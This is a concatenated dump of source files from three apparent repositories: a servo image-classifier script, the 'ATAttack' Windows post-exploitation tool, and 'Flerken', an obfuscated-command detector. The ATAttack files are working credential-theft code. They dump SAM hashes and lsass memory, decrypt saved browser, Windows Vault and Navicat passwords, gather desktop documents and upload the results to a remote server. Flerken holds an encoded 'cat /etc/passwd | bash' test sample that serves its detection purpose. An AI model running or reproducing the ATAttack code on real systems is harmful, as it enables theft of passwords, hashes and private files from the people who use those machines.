hists.append(hist)
return hists
def get_model(reg=0.0, linear=False):
optimizer = tf.keras.optimizers.SGD(learning_rate=0.03, momentum=0.7)
model = Sequential()
model.add(Conv2D(10, 3,3, activation='sigmoid', input_shape=(18,30,1), kernel_regularizer=l2(reg)))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Flatten())
model.add(Dense(20, activation='sigmoid', kernel_regularizer=l2(reg)))
if linear:
model.add(Dense(1, activation='linear', kernel_regularizer=l2(reg)))
model.compile(optimizer=optimizer, loss='mse', metrics=['accuracy'])
else:
model.add(Dense(15, activation='sigmoid', kernel_regularizer=l2(reg)))
model.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy'])
return model
#def get_
def proc_img(img, rows_removed=12, break_point=0.5):
img = img/255.0
img = (img>break_point)*1.0
img = img.reshape(30,30)
img = img[rows_removed:,:]
return img.reshape(30-rows_removed, 30)
def pre_proc(data, rows_removed=12, break_point=0.5):
new_imgs = []
for img_idx in range(np.shape(data)[0]):
new_imgs.append(proc_img(data[img_idx], rows_removed=rows_removed, break_point=break_point))
return np.array(new_imgs)
#return np.apply_along_axis(f, axis=1, arr=data)
# positions are a integer in the range [0,15)
def load_imgs(directories):
if type(directories) != list:
directory = directories
data = []
positions = []
for filename in os.listdir(directory):
img = cv2.imread(directory+"/"+filename,0)
data.append(img)
positions.append(get_servo_pos(filename)-1)
data = np.array(data)
return (data, np.array(positions))
else:
data = []
positions = []
for directory in directories:
for filename in os.listdir(directory):
img = cv2.imread(directory+"/"+filename,0)
data.append(img)
positions.append(get_servo_pos(filename)-1)
return (np.array(data), np.array(positions))
def get_servo_pos(fname):
underscore_idx = fname.find("_")
dot_idx = fname.find(".")
return int(fname[underscore_idx+1:dot_idx])
def show_imgs(X, Y, pred_Y):
s = X.shape
r = s[0]
row_idx = 0
while row_idx < r:
print(str(Y[row_idx]) + ", " + str(pred_Y[row_idx]))
k = display_example(X[row_idx])
if k == 27:
break
if k == 108:
row_idx -= 2
row_idx += 1
def display_example(x):
img = x
r = None
c = None
if len(x.shape) == 1:
l = x.shape
img = x.reshape(int(l[0]/30),30)
else:
(_,r,c,_) = x.shape
if r != None and r != 1:
img = x.reshape(r,30)
cv2.imshow("example", img)
k = cv2.waitKey(0)
cv2.destroyWindow("example")
return k
# takes every image in srcdir then flips it and stores the flipped image as
# flipped<original random str>_<flipped label>.png in dstdir
# for example FA54HG_1.png becomes flipped_FA54HG_15.png
def create_flipped_dataset(srcdir, dstdir):
for file_name in os.listdir(srcdir):
org_img = cv2.imread(srcdir+"/"+file_name)
flipped_img = cv2.flip(org_img, 1)
org_label = get_servo_pos(file_name)
flipped_label = 16-org_label
random_str = file_name[0:file_name.find("_")]
cv2.imwrite(dstdir+"/"+"flipped"+random_str+"_"+str(flipped_label)+".png", flipped_img)
def preproc_files(srcdir, dstdir):
for file_name in os.listdir(srcdir):
org_img = cv2.imread(srcdir+"/"+file_name, 0)
pimg = proc_img(org_img, rows_removed=12, break_point=0.5)
org_label = get_servo_pos(file_name)
random_str = file_name[0:file_name.find("_")]
cv2.imwrite(dstdir+"/"+"preproc"+random_str+"_"+str(org_label)+".png", pimg*255)
if __name__ == '__main__':
main()
|
[
"/ann.py",
"/car.py",
"/experiment.py",
"/recorder.py",
"/sd.py",
"/server.py",
"/test.py",
"/trainer.py"
] |
02bx/ATAttack
|
#!/usr/bin/python
# coding=utf-8
from ATAttack.framework.win32.hashdump import dump_file_hashes
from ATAttack.framework.constant import constant
import subprocess
import os
try:
import _subprocess as sub
STARTF_USESHOWWINDOW = sub.STARTF_USESHOWWINDOW
SW_HIDE = sub.SW_HIDE
except ImportError:
STARTF_USESHOWWINDOW = subprocess.STARTF_USESHOWWINDOW
SW_HIDE = subprocess.SW_HIDE
class samdump:
def __init__(self):
pass
def save_hives(self):
"""
Save SAM Hives
"""
sammhives = []
try:
for h in constant.hives:
if not os.path.exists(constant.hives[h]):
cmdline = r'reg.exe save hklm\%s %s' % (
h, constant.hives[h])
command = ['cmd.exe', '/c', cmdline]
info = subprocess.STARTUPINFO()
info.dwFlags = STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
p = subprocess.Popen(
command,
startupinfo=info,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdout=subprocess.PIPE,
universal_newlines=True)
results, _ = p.communicate()
sammhives.append(constant.hives[h])
ntlm = dump_file_hashes(sammhives[0], sammhives[1])
# lsass_dump()
return ntlm[0]
except BaseException: # Catch all kind of exceptions
pass
finally:
self.delete_hives()
def delete_hives(self):
"""
Delete SAM Hives
"""
# Try to remove all temporary files
for h in constant.hives:
if os.path.exists(constant.hives[h]):
try:
os.remove(constant.hives[h])
except Exception:
pass
--- FILE SEPARATOR ---
#!/usr/bin/python
# coding=utf-8
import threading
import subprocess
import Queue
adder = []
queue = Queue.Queue()
class ThreadUrl(threading.Thread):
def __init__(self, queue):
threading.Thread.__init__(self)
self.queue = queue
def run(self):
while True:
host = self.queue.get()
cmd = 'ping -n 2 -w 5 {}'.format(
host,)
p = subprocess.Popen(cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True
)
result = p.stdout.read().decode('cp936').encode('utf-8').strip()
if "TTL=" in result:
ipadder = host.split('.')[0] + '.' + host.split('.')[1] + '.' + host.split('.')[2] + ".1/24"
adder.append(ipadder)
self.queue.task_done()
def ipfind(cidr):
for i in range(100):
t = ThreadUrl(queue)
t.setDaemon(True)
t.start()
for host in cidr:
queue.put(host)
queue.join()
return adder
--- FILE SEPARATOR ---
import os
import json
def powershell(cmd):
arg = r"powershell.exe " + cmd
powershell_ = os.popen(arg).read()
num = powershell_.decode('gbk')
write = num.split('\r\n')
return write
def regedit():
list_ = []
version = [
r'HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\\',
r'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\\']
for os in version:
query = r"$RegPath = 'Registry::{}\\';".format(os)+ '$QueryPath = dir $RegPath -Name;' \
+ 'foreach($Name in $QueryPath)' + '{(Get-ItemProperty -Path $RegPath$Name).DisplayName}'
list_.append(powershell(query))
return json.dumps(list_, encoding="UTF-8", ensure_ascii=False)
--- FILE SEPARATOR ---
#! /usr/bin/env python2.7
# -*- coding: utf-8 -*-
import win32api
import win32con
from ATAttack.utility.decrypt import *
from ATAttack.framework.constant import constant
from ATAttack.enumeration.uninstall import regedit
command_list = []
class Software:
def __init__(self,_server):
self._server = _server
print '[*] Running history finder'
def getpatch(self, llsit):
return list(set(llsit))
def get_chrome_history(self):
try:
history_db = os.path.join(
constant.profile['LOCALAPPDATA'],u'Google\Chrome\\User Data\Default\history')
c = sqlite3.connect(history_db)
cursor = c.cursor()
select_statement = "SELECT urls.url FROM urls;"
cursor.execute(select_statement)
results = cursor.fetchall()
for i in results:
command_list.append(i[1])
c.close()
return command_list
except Exception:
return False
def get_ie_history(self):
reg_root = win32con.HKEY_CURRENT_USER
reg_path = r"Software\\Microsoft\\Internet Explorer\\typedURLs"
reg_flags = win32con.WRITE_OWNER | win32con.KEY_WOW64_64KEY | win32con.KEY_ALL_ACCESS
try:
key = win32api.RegOpenKeyEx(reg_root, reg_path, 0, reg_flags)
i = 0
while True:
url = (win32api.RegEnumValue(key, i))
command_list.append(url[1])
i += 1
win32api.RegCloseKey(key)
except Exception:
pass
return command_list
def get_Firefox_history(self):
data_path = os.path.join(
constant.profile['APPDATA'],u'Mozilla\\Firefox\\Profiles\\')
fs = os.listdir(data_path)
dict = []
for f1 in fs:
tmp_path = os.path.join(data_path, f1)
if os.path.isdir(tmp_path):
dict.append(tmp_path + r'\places.sqlite')
for ct in dict:
conn = sqlite3.connect(ct)
c = conn.cursor()
c.execute('select id, url, title from moz_places')
results = c.fetchall()
for i in results:
command_list.append(i[1])
c.close()
return command_list
def get_360c_history(self):
try:
history_db = os.path.join(
constant.profile['LOCALAPPDATA'],u'360Chrome\\Chrome\\User Data\\Default\\history')
if os.path.exists(history_db):
c = sqlite3.connect(history_db)
cursor = c.cursor()
select_statement = "SELECT urls.url FROM urls;"
cursor.execute(select_statement)
results = cursor.fetchall()
for i in results:
command_list.append(i[1])
c.close()
return list(set(command_list))
except Exception:
return False
def run(self):
Installation = regedit()
output = decypt()
print '[*] Finding histroy in ie'
self.get_ie_history()
output.ie_decrypt()
# output.decrypt_using_netsh()
if re.findall("Google+", Installation, re.S):
print '[*] Finding histroy in Chrome'
self.get_chrome_history()
output.get_decypt_chrome()
else:
pass
if re.findall("Mozilla+", Installation, re.S):
print '[*] Finding histroy in Firefox'
self.get_Firefox_history()
output.send_firefox_data()
else:
pass
self.get_360c_history()
output.get_decypt_360chrome()
try:
if re.findall('Navicat+', Installation, re.S):
print "[*] Attempting to decrypt Navicat"
for i, j in constant.regs.items():
try:
output.get_info(j)
except:
continue
except Exception:
pass
# print_warning("Please wait while uploading ... ")
log_tmp = list(set(command_list))
for history in log_tmp:
with open(constant.tmp_name, "a") as file:
file.writelines(history + '\r\n')
file.close()
return log_tmp
--- FILE SEPARATOR ---
#! /usr/bin/env python2.7
# -*- coding: utf-8 -*-
import sqlite3
import win32crypt
import configparser
import shutil
import re
import win32cred
import random,string
import os
from ATAttack.framework.constant import constant
import subprocess
import _subprocess as sub
import tempfile
from winreg import OpenKey, HKEY_CURRENT_USER, EnumKey, EnumValue,CloseKey
tmp = tempfile.gettempdir()
class decypt():
def __init__(self):
self.database_query = 'SELECT action_url, username_value, password_value FROM logins'
def str_rangdom(self):
return ''.join(random.sample(string.ascii_letters + string.digits,8))
def copy_db(self,db_path,database_path):
try:
if os.path.isfile(db_path):
shutil.copy(db_path, database_path)
return database_path
except Exception:
pass
def clean_file(self, db_path):
try:
os.popen('RD /S /Q ' + db_path)
except Exception:
return False
def get_decypt_chrome(self):
db_path = os.path.join(
constant.profile['LOCALAPPDATA'],u'Google\Chrome\\User Data\Default\Login Data')
databases = self.copy_db(db_path,tmp + os.sep + self.str_rangdom())
try:
conn = sqlite3.connect(databases)
cursor = conn.cursor()
cursor.execute(self.database_query)
for url, login, password in cursor.fetchall():
password = win32crypt.CryptUnprotectData(password, None, None, None, 0)
if password:
print "Chrome browser decryption result: "
print 'Title: ' + url
print 'Username: ' + login
print 'Password: ' + password
except Exception:
return False
finally:
conn.close()
os.remove(databases)
def get_decypt_360chrome(self):
file_path = os.path.join(
constant.profile['LOCALAPPDATA'],r'360Chrome\Chrome\User Data\Default\Login Data')
if os.path.exists(file_path):
databases = self.copy_db(file_path,tmp + os.sep + self.str_rangdom())
try:
conn = sqlite3.connect(databases)
cursor = conn.cursor()
print '[*] Finding histroy in 360Chrome'
cursor.execute(
'SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(
result[2], None, None, None, 0)[1]
if password:
print "360 browser decryption result: "
print 'Title: ' + result[0]
print 'Username: ' + result[1]
print 'Password: ' + password
conn.close()
os.remove(databases)
except Exception :
pass
def get_firefox_profiles(self):
iniPath = os.path.join(constant.profile['APPDATA'],
r'Mozilla\Firefox\profiles.ini')
config = configparser.ConfigParser()
config.read(iniPath)
return os.path.join(
constant.profile['APPDATA'],r'Mozilla\Firefox',config['Profile0']['Path'] + '\\') .replace("/", "\\")
def send_firefox_data(self):
key = ['key4.db', 'key3.db', 'logins.json']
for db in key:
filename = self.get_firefox_profiles() + db
if os.path.isfile(filename):
shutil.copy(filename, constant.upload_dir)
def ie_decrypt(self):
try:
cmdline = '''
try
{
#Load the WinRT projection for the PasswordVault
$Script:vaultType = [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$Script:vault = new-object Windows.Security.Credentials.PasswordVault -ErrorAction silentlycontinue
}
catch
{
throw "This module relies on functionality provided in Windows 8 or Windows 2012 and above."
}
#endregion
function Get-VaultCredential
{
process
{
try
{
&{
$Script:vault.RetrieveAll()
} | foreach-Object { $_.RetrievePassword() ; "Username......";$_.UserName;"######";"Password......";$_.Password;"######";"Website......";$_.Resource;"_________" }
}
catch
{
Write-Error -ErrorRecord $_ -RecommendedAction "Check your search input - user: $UserName resource: $Resource"
}
}
end
{
Write-Debug "[$cmdName] Exiting function"
}
}
Get-VaultCredential
'''
command = ['powershell.exe', '/c', cmdline]
info = subprocess.STARTUPINFO()
info.dwFlags = sub.STARTF_USESHOWWINDOW | sub.CREATE_NEW_PROCESS_GROUP
info.wShowWindow = sub.SW_HIDE
p = subprocess.Popen(command, startupinfo=info, stderr=subprocess.STDOUT, stdout=subprocess.PIPE,
universal_newlines=True)
results, _ = p.communicate()
passwords = []
for result in results.replace('\n', '').split('_________'):
values = {}
if result:
for res in result.split('######'):
values[res.split('......')[0]] = res.split('......')[1]
passwords.append(values)
print "Get common credentials for windows vault :" + "\n" + str(passwords)
CRED_TYPE_GENERIC = win32cred.CRED_TYPE_GENERIC
CredRead = win32cred.CredRead
creds = win32cred.CredEnumerate(None, 0) # Enumerate credentials
credentials = []
for package in creds:
try:
target = package['TargetName']
creds = CredRead(target, CRED_TYPE_GENERIC)
credentials.append(creds)
except Exception:
pass
values_ = {}
for cred in credentials:
values_['service'] = cred['TargetName']
values_['UserName'] = cred['UserName']
values_['pwd'] = cred['CredentialBlob'].decode('utf16')
print "Get windows vault web credentials :" + "\n" + str(values_)
except Exception:
pass
def get_info(self,reg):
key = OpenKey(HKEY_CURRENT_USER, reg)
conns = []
try:
i = 0
while 1:
name = EnumKey(key, i)
conns.append(name)
i += 1
except:
pass
hosts = []
usernames = []
passwords = []
for i in conns:
key = OpenKey(HKEY_CURRENT_USER, reg + '\\' + i)
try:
j = 0
while 1:
name, value, type = EnumValue(key, j)
if name == 'Host':
hosts.append(value)
if name == 'UserName':
usernames.append(value)
if name == 'Pwd':
passwords.append(value)
j += 1
except:
pass
CloseKey(key)
for i in range(len(hosts)):
if len(hosts[i]) is not 0:
print 'host_name:' + hosts[i] + ' ' + 'username:' + usernames[i] + ' ' + 'password:' + passwords[i]
--- FILE SEPARATOR ---
#! /usr/bin/env python2.7
# -*- coding:UTF-8 -*-
import fnmatch
import sys
from ATAttack.utility.browser import *
from ATAttack.enumeration.host import ipfind
from ATAttack.credentials.check import ipadders, smb_version
from ATAttack.framework.prints import *
from ATAttack.utility.browser import Software
from ATAttack.enumeration.tasklist import disk
from ATAttack.enumeration.tasklist import tasklist,token
from ATAttack.enumeration.connect import login_
from ATAttack.framework.constant import constant
from ATAttack.enumeration.upload import upload
from ATAttack.credentials.dump import samdump
import argparse
ipadder_list = []
tmp = os.mkdir(constant.upload_dir)
reload(sys)
sys.setdefaultencoding("utf-8")
class Credentials:
def __init__(self, host, username, password):
self.host = host
self.username = username
self.password = password
if self.username is None:
self.username = 'anonymous'
class exploit:
def __init__(self, list,_server):
self.list = list
self.ftp = _server
def cmd(self, list):
self.browers_history()
for i in list:
ret = os.popen(i).read()
ipadder_list.append(ret.decode('cp936').encode('utf-8').strip())
ip = re.findall(
r'1(?:\d{1,3}\.){3}\d{1,3}(?![\.\d])',
str(ipadder_list),
re.S)
iplist = []
for ipaddr in ip:
ipadder = ipaddr.split(
'.')[0] + '.' + ipaddr.split('.')[1] + '.' + ipaddr.split('.')[2]
iplist.append(ipadder)
return iplist
def pings(self):
list = []
ipadder = (set(self.cmd(constant.cmdlist)))
aparagraph = [x + ".1" for x in ipadder]
bparagraph = [x + ".254" for x in ipadder]
aparagraph.extend(bparagraph)
for add in aparagraph:
if ipadders().is_internal_ip(add):
list.append(add)
print_info("{} were obtained through information collection".format(
str(len(list))))
regex = set(ipfind(list))
return regex
def ipcidr(self):
dump = samdump().save_hives()
# dump = "fc66399dae9416d8455605b8498ea328"
print_success(
"Successful acquisition of administrator ntlmhash :{}".format(dump))
print_warning(
"Attempting to export the lsass.exe process")
tasklist = os.popen('tasklist /svc | findstr lsass.exe').read()
regex = re.findall(r'\d+', tasklist, re.S)
payload = r'powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump {} {} full"'.format(
regex[0], constant.dump_name)
os.system(payload)
for network in self.pings():
print_warning("Discovered that the segment network is reachable :" + network )
smb_version(network, dump)
def browers_history(self,):
Software_ = Software(self.ftp)
for url in Software_.run():
import urlparse
url_change = urlparse.urlparse(url)
host = url_change.netloc
ipadder_list.append(host)
class information():
@staticmethod
def run():
if len(disk()) == 1:
exit()
print_success('Existing in the current process' + tasklist())
login_().rdplogin_()
print_success("Delegation tokens Available" + "\n" + str(token()))
dir = os.path.join(os.path.expanduser("~"), 'Desktop') + '\\'
print_warning('Attempting to obtain system sensitive files')
file = ['*.pdf', '*.doc', '*.docx', '*.ppt', '*.pptx', "*.xlsx", "*.rtf", "*.csv",'*.txt']
f = open(constant.tmp_name_, 'w')
for root, dirs, files in os.walk(dir):
for name in files:
for file_ in file:
if fnmatch.fnmatch(name, file_):
f.write(os.path.join(root, name))
f.write('\n')
f.close()
class _start():
@staticmethod
def run(_server):
print_warning('temporary Storage Folder :' + constant.upload_dir)
ia = information()
ia.run()
ig = exploit(constant.cmdlist,_server)
ig.ipcidr()
def clean(self):
try:
os.system("rd /s/q" + " " + constant.upload_dir)
except Exception:
pass
if __name__ == '__main__':
parse = argparse.ArgumentParser(description="ATAttack")
parse.add_argument('-t', '--host', type=str, help="host")
parse.add_argument('-u', '--username', type=str, help="username")
parse.add_argument('-p', '--password', type=str, help="password",)
parse.add_argument('-d', '--domain', type=str, help="upload",)
args = parse.parse_args()
host = args.host
domain = args.domain
username = args.username
password = args.password
server = None
if not args.domain:
_start().run(server)
if args.domain:
_start().run(server)
_server = upload(credentials='')
filename = _server.encrypt(constant.upload_dir)
_server.HTTPupload(domain,filename)
_start().clean()
try:
if args.host:
print_warning("Attempt to connect to FTP server :" + host)
credentials = Credentials(host, username, password)
_server = upload(credentials)
_start().run(_server)
print_warning("Please wait while uploading ... ")
if os.path.getsize(constant.dump_name) == 0:
_server.lsass_dump()
_server.ftp_upload(_server.encrypt(constant.upload_dir))
except Exception:
pass
finally:
_start().clean()
|
[
"/ATAttack/credentials/dump.py",
"/ATAttack/enumeration/host.py",
"/ATAttack/enumeration/uninstall.py",
"/ATAttack/utility/browser.py",
"/ATAttack/utility/decrypt.py",
"/exploit.py"
] |
02bx/Flerken
|
#!/usr/bin/python
# -*-coding:utf-8-*-
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
import sys
import os
sys.path.append('../flerken/control')
from smart_detect import smart_detect
LINUX_SAMPLE_PATH = 'samples/linux.txt'
WIN_SAMPLE_PATH = 'samples/win.txt'
OUTPUT_PATH = 'output'
def win_sample_test():
total = 0
obfus = 0
with open(os.path.join(OUTPUT_PATH,'win_res.txt'),'w') as fo:
#read sample file
with open(WIN_SAMPLE_PATH) as fs:
for cmd in fs.readlines():
total = total + 1
smart = smart_detect(cmd)
res = smart.not_sure_identify()
if res['obfuscated'] == True and res['likely_platform'] == 'windows':
obfus = obfus + 1
fo.write('[windows obfuscated]: '+cmd+'\n')
elif res['obfuscated'] == True and res['likely_platform'] == 'linux':
fo.write('[wrong platform detected]: '+cmd+'\n')
else:
fo.write('[not obfuscated detected]: '+cmd+'\n')
print("windows coverage rate is "+str(round((obfus/total),5)*100)+'%')
def linux_sample_test():
total = 0
obfus = 0
with open(os.path.join(OUTPUT_PATH,'linux_res.txt'),'w') as fo:
#read sample file
with open(LINUX_SAMPLE_PATH) as fs:
for cmd in fs.readlines():
total = total + 1
smart = smart_detect(cmd)
res = smart.not_sure_identify()
if res['obfuscated'] == True and res['likely_platform'] == 'linux':
obfus = obfus + 1
fo.write('[linux obfuscated]: '+cmd+'\n')
elif res['obfuscated'] == True and res['likely_platform'] == 'windows':
fo.write('[wrong platform detected]: '+cmd+'\n')
else:
fo.write('[not obfuscated detected]: '+cmd+'\n')
print("linux coverage rate is "+str(round((obfus/total),5)*100)+'%')
if '__main__' == __name__:
print('''
________________ ______
___ ____/___ /_____ ___________ /_______ _______
__ /_ __ / _ _ \__ ___/__ //_/_ _ \__ __ \\
_ __/ _ / / __/_ / _ ,< / __/_ / / /
/_/ /_/ \___/ /_/ /_/|_| \___/ /_/ /_/
Flerken Coverage Test Tool, All Your Obfuscations Are Belong To Us!
''')
print("[+]Checking windows samples, please waiting...")
win_sample_test()
print("[+]Checking linux samples, please waiting...")
linux_sample_test()
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
"""
Init Flerken App
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
from flask import Flask
from flask_wtf.csrf import CSRFProtect
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
from .config.global_config import APP_CONFIG
import logging
app = Flask(__name__)
CSRFProtect(app)
app.debug = APP_CONFIG['DEBUG']
app.secret_key = APP_CONFIG['SECRET_KEY']
if APP_CONFIG['QPS_LIMIT'] == True:
limiter = Limiter(
app,
key_func=get_remote_address,
default_limits=APP_CONFIG['LIMIT_SETTING'],
)
# log file config
handler = logging.FileHandler(APP_CONFIG['LOG_FILE'], encoding='UTF-8')
logging_format = logging.Formatter(
'%(asctime)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s')
handler.setFormatter(logging_format)
app.logger.addHandler(handler)
import flerken.landing
import flerken.detection
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
"""
config
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
APP_CONFIG = {
"HOST": "127.0.0.1",
"PORT": 8081,
"DEBUG": True, #debug mode
"SECRET_KEY": "awesomeflerken*",
"QPS_LIMIT": True,
"LIMIT_SETTING": ["200 per minute", "5 per second"],
"LOG_FILE": "flerken.log"
}
DB_CONFIG = {
0: {
"host": "127.0.0.1",
"port": "3306",
"user": "root",
"password": "",
"database": "flerken",
'charset': 'utf8',
'DB_DEBUG': True, # Please set this field to 'False' when your website going online
'autocommit': True
}
}
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
# Path:plugins/custom_meta_chars_plugin.py
"""
This module filters unexpected chars in command
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
import re
import json
import os
class custom_meta_chars_plugin(object):
def __init__(self, cmd):
self.cmd = cmd
self.rules = self._load_rules()
self.result = self._check()
def _load_rules(self):
try:
with open(os.path.join(os.getcwd(),'flerken/config/rules/meta_chars.json')) as f:
rules = json.loads(f.read())
return rules
except Exception:
with open(os.path.join(os.getcwd(),'../flerken/config/rules/meta_chars.json')) as f:
rules = json.loads(f.read())
return rules
def _check(self):
pattern_valid = re.compile(self.rules['meta_chars'])
cmd = pattern_valid.sub("",self.cmd)
return cmd
if __name__ == '__main__':
#test
sample1 = 'ddd121323213*&^&%$$")({}[]'
print('input cmd: '+sample1)
a = custom_meta_chars_plugin(sample1).result
print('out: '+str(a))
sample2 = 'vcvddd12132fgfdgfdgfd3213*&^&%$$")3(e3wqre{rrewr}[]'
print('input cmd: '+sample2)
b = custom_meta_chars_plugin(sample2).result
print('out: '+str(b))
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
# Path:plugins/linux_generic_detect_plugin.py
"""
This module detects linux generic obfuscation commands
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
import warnings
import re
import os,sys
import json
from .linux_generic_filter_plugin import linux_generic_filter_plugin
class linux_generic_detect_plugin(object):
def __init__(self, cmd):
self.cmd = cmd
#OBFUSCATED TYPE STORAGE
self.__TYPE_LIST = []
self.result = self._detect_obfuscation()
def _load_generic_rules(self, type):
try:
with open(os.path.join(os.getcwd(),'flerken/config/rules/linux_rule.json')) as f:
self.rules = json.loads(f.read())['generic'][type]
return self.rules
except Exception:
with open(os.path.join(os.getcwd(),'../flerken/config/rules/linux_rule.json')) as f:
self.rules = json.loads(f.read())['generic'][type]
return self.rules
def _prepare_pattern(self, regex):
"""
Strip out key:value pairs from the pattern and compile the regular
expression.
"""
try:
return re.compile(regex)
except re.error as e:
warnings.warn(
"Caught '{error}' compiling regex: {regex}"
.format(error=e, regex=regex)
)
return re.compile(r'(?!x)x')
def _check(self, type):
flag = -1
for r in range(0,len(self.rules)):
regex_compiled = self._prepare_pattern(self.rules[str(r)]['regex'])
if 'length' in self.rules[str(r)].keys():
if self.rules[str(r)]['condition'] == '<':
if regex_compiled.search(self.cmd) != None and len(self.cmd) < self.rules[str(r)]['length']:
flag = r
continue
else:
break
if self.rules[str(r)]['condition'] == '>':
if regex_compiled.search(self.cmd) != None and len(self.cmd) > self.rules[str(r)]['length']:
flag = r
continue
else:
break
if self.rules[str(r)]['condition'] == '<=':
if regex_compiled.search(self.cmd) != None and len(self.cmd) <= self.rules[str(r)]['length']:
flag = r
continue
else:
break
if self.rules[str(r)]['condition'] == '>=':
if regex_compiled.search(self.cmd) != None and len(self.cmd) >= self.rules[str(r)]['length']:
flag = r
continue
else:
break
if self.rules[str(r)]['condition'] == '=':
if regex_compiled.search(self.cmd) != None and len(self.cmd) == self.rules[str(r)]['length']:
flag = r
continue
else:
break
else:
if regex_compiled.search(self.cmd) != None:
flag = r
continue
else:
break
if flag == len(self.rules) -1:
self.__TYPE_LIST.append(type)
def _varible_name_score(self):
score=0
pattern = self._load_generic_rules('varible_name_score')["0"]['regex']
try:
pattern_str = re.compile(pattern)
result_str = pattern_str.findall(self.cmd)
result_str = list(set(result_str))
for string_ele in result_str:
if len(string_ele)>0:
pattern_repeat = re.compile(r'%s' %string_ele)
target_str = pattern_repeat.findall(self.cmd)
if len(target_str)>1:
score += 1
if score > 1:
score = 1
else:
score = 0
return score
except Exception as e:
print(e)
def _varible_name_check(self):
vn_rules = self._load_generic_rules('varible_name')
vn_rules_compiled = dict()
for rule in vn_rules:
vn_rules_compiled[int(rule)] = self._prepare_pattern(vn_rules[rule]['regex'])
if vn_rules_compiled[0].search(self.cmd) != None:
if self._varible_name_score() == 1:
if vn_rules_compiled[1].search(self.cmd) != None:
if linux_generic_filter_plugin(self.cmd,'varible_name').result == False:
if len(self.cmd) < 1000:
self.__TYPE_LIST.append('varible_name')
def _detect_obfuscation(self):
type_list = ["echo_type", "sub_syntax", "special_calc", "ifs", "offset_ctl", "escape_char", "reverse_char", "base64", "rot13_char", "octal_code", "hex_or_unicode", "wildcard"]
for type in type_list:
if linux_generic_filter_plugin(self.cmd,type).result == False:
self._load_generic_rules(type)
self._check(type)
self._varible_name_check()
if len(self.__TYPE_LIST) > 0:
return {"obfuscated": True, "reason": "linux.obfus.generic"}
else:
return {"obfuscated": False, "reason": ""}
if __name__ == '__main__':
#test
sample = "echo $'\\143\\141\\164\\040\\057\\145\\164\\143\\057\\160\\141\\163\\163\\167\\144' | bash"
print('input cmd: '+sample)
linux_generic_detect_plugin(sample)._detect_obfuscation()
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
# Path:plugins/linux_generic_filter_plugin.py
"""
This module filters linux generic obfuscation commands
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
import re
import json
import os
class linux_generic_filter_plugin(object):
def __init__(self,cmd, type):
self.cmd = cmd
self.type = type
self.whitelists = self._load_generic_whitelists()
self.result = self._check()
def _load_generic_whitelists(self):
try:
with open(os.path.join(os.getcwd(),'flerken/config/whitelists/linux_whitelist.json')) as f:
whitelists = json.loads(f.read())['generic'][self.type]
return whitelists
except Exception:
with open(os.path.join(os.getcwd(),'../flerken/config/whitelists/linux_whitelist.json')) as f:
whitelists = json.loads(f.read())['generic'][self.type]
return whitelists
def _prepare_pattern(self, regex):
"""
Strip out key:value pairs from the pattern and compile the regular
expression.
"""
try:
return re.compile(regex)
except re.error as e:
warnings.warn(
"Caught '{error}' compiling regex: {regex}"
.format(error=e, regex=regex)
)
return re.compile(r'(?!x)x')
def _check(self):
for wl in range(0,len(self.whitelists)):
regex_compiled = self._prepare_pattern(self.whitelists[str(wl)]['regex'])
if 'length' in self.whitelists[str(wl)].keys():
if self.whitelists[str(wl)]['condition'] == '<':
if regex_compiled.search(self.cmd) != None and len(self.cmd) < self.whitelists[str(wl)]['length']:
return True
break
else:
continue
if self.whitelists[str(wl)]['condition'] == '>':
if regex_compiled.search(self.cmd) != None and len(self.cmd) > self.whitelists[str(wl)]['length']:
return True
break
else:
continue
if self.whitelists[str(wl)]['condition'] == '<=':
if regex_compiled.search(self.cmd) != None and len(self.cmd) <= self.whitelists[str(wl)]['length']:
return True
break
else:
continue
if self.whitelists[str(wl)]['condition'] == '>=':
if regex_compiled.search(self.cmd) != None and len(self.cmd) >= self.whitelists[str(wl)]['length']:
return True
break
else:
continue
if self.whitelists[str(wl)]['condition'] == '=':
if regex_compiled.search(self.cmd) != None and len(self.cmd) == self.whitelists[str(wl)]['length']:
return True
break
else:
continue
else:
if regex_compiled.search(self.cmd) != None:
return True
break
else:
continue
return False
if __name__ == '__main__':
#test
sample = '$(echo 3)'
print('input cmd: '+sample)
print(linux_generic_filter_plugin(sample,"echo_type").result)
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
# Path:plugins/linux_graphic_detect_plugin.py
"""
This module detects linux graphic obfuscation commands
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
import re
import json
import os
class linux_graphic_detect_plugin(object):
def __init__(self, cmd):
self.cmd = cmd
self.result = self._detect_obfuscation()
def _load_graphic_rule(self):
try:
